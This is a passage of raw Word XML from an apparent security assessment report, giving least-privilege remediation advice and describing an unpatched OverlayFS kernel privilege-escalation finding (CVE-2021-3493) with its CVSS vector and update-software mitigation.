        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6DB3721A" w:rsidP="0D325B6E" w:rsidRDefault="6DB3721A" w14:paraId="11D5170C" w14:textId="38F24F6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>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administrative access policies </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="59C72949">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to ensure a </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clear </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procedure</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5D1BD4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="55D1BD4B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows </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nl</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y </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requir</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 use</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rs</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48D6169">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to have</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 xml:space="preserve"> ad</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mi</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DB3721A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n privileges on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="316FCF54" w:rsidP="0D325B6E" w:rsidRDefault="316FCF54" w14:paraId="27A94731" w14:textId="3C7104B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:num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16FCF54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Continuously update and audit user permissions to avoid permissio</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="316FCF54">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316FCF5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16FCF54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creep</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="316FCF54">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> over time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="413276CC" w14:textId="4DBC58E8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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021F7A" w:rsidP="0D325B6E" w:rsidRDefault="34021F7A" w14:paraId="1226905D" w14:textId="5880E2A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021F7A">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486E332E" w:rsidP="0D325B6E" w:rsidRDefault="486E332E" w14:paraId="6E1D18C1" w14:textId="744C99E3">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rbeb5997247d7414c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="486E332E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CrowdStrike - Principle of Least Privilege</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="738C6CD3" w:rsidP="0D325B6E" w:rsidRDefault="738C6CD3" w14:paraId="69514F51" w14:textId="2789885B">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3f0e11eb6bc94b55">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="738C6CD3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CISA - Weak User Management and Security Controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="738C6CD3">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259DA2D5" w14:textId="5C447012">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1FA72530" w14:textId="052281DB">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="40021711" w:rsidP="0D325B6E" w:rsidRDefault="40021711" w14:paraId="6E5C57C0" w14:textId="0053AF40">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1636785732" w:id="1923065918"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40021711">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40021711">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="40021711">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc2089785247" w:id="1772375883"/>
      <w:bookmarkStart w:name="_Toc297902023" w:id="183120216"/>
      <w:bookmarkStart w:name="_Toc1929654849" w:id="984281877"/>
      <w:bookmarkStart w:name="_Toc32765568" w:id="1545780631"/>
      <w:bookmarkStart w:name="_Toc1397702392" w:id="692180320"/>
      <w:bookmarkStart w:name="_Toc801992150" w:id="465227171"/>
      <w:bookmarkStart w:name="_Toc807429099" w:id="1351619036"/>
      <w:bookmarkStart w:name="_Toc188610200" w:id="385753601"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74195F26">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Unpatched Kernel Vulnerability - </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74195F26">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OverlayFS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465227171"/>
      <w:bookmarkEnd w:id="1351619036"/>
      <w:bookmarkEnd w:id="385753601"/>
      <w:bookmarkEnd w:id="1772375883"/>
      <w:bookmarkEnd w:id="183120216"/>
      <w:bookmarkEnd w:id="984281877"/>
      <w:bookmarkEnd w:id="1545780631"/>
      <w:bookmarkEnd w:id="692180320"/>
      <w:bookmarkEnd w:id="192306591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30E47F9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0ACA874" w14:textId="20F7D94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903335F" w14:textId="2A16376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2C91361" w14:textId="76C6F4B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DAF7B0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3A15D59" w14:textId="4F2AF09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3CB89E0" w14:textId="5A468729">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A828D28" w14:textId="1F22DE40">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53439933">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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500BC10" w14:textId="6124CB18">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2CFFE17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8E29C4" w14:textId="547876B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1CAB9FC2" w14:textId="58302049">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CBBB7F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B9CB56D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7D42B54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CD6733" w14:textId="5FB5719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AF51148" w:rsidP="0D325B6E" w:rsidRDefault="1AF51148" w14:paraId="33C771B0" w14:textId="299EDCC4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R2cf3138a87c74dbd">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1AF51148">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="1AF51148">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="204E2A8D">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114A64" w14:textId="5EC8718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EAC6581" w:rsidP="0D325B6E" w:rsidRDefault="6EAC6581" w14:paraId="0770EE25" w14:textId="7380F9E1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="6EAC6581">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5246C4E" w14:textId="6558B8C7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re7cb06448ce84903">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031AD174">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>608</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4AD88095">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="031AD174">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Exploitation for </w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="031AD174">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Privilege</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="031AD174">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4DBD7CD4">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95B2E03"/>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DDC53DB" w:rsidP="0D325B6E" w:rsidRDefault="5DDC53DB" w14:paraId="44C74314" w14:textId="5D7A4E91">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="5DDC53DB">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8F72B93" w:rsidP="0D325B6E" w:rsidRDefault="58F72B93" w14:paraId="0882ECFB" w14:textId="1E5A5012">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rcb0feb396d944273">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58F72B93">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1051: Update Software</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="66B8CBC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C772E8" w14:textId="00498C27">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0AA951D" w14:textId="108A0E17">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54D088C" w14:textId="378ECB45">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="74195F26" w:rsidP="0D325B6E" w:rsidRDefault="74195F26" w14:paraId="76A87004" w14:textId="1D1C558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4195F2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6E64668" w:rsidP="0D325B6E" w:rsidRDefault="66E64668" w14:paraId="7FFA23D8" w14:textId="17CC669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18305E7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">affected host is running an outdated </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1CFF514A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="18305E7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel vulnerable to</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C2F397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3BD8604">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE-202</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0C4E1D2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73BD8604">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8C8ADD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3493</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73BD8604">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Ov</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erlayF</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B059F65">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61C4C12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This exploit</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 allows a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13D72D69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n attacker</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 to es</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calate privileges from </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2A2B3349">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6E642A6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8CAB2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low-</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7B4CEE7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privileged</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6E64668">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
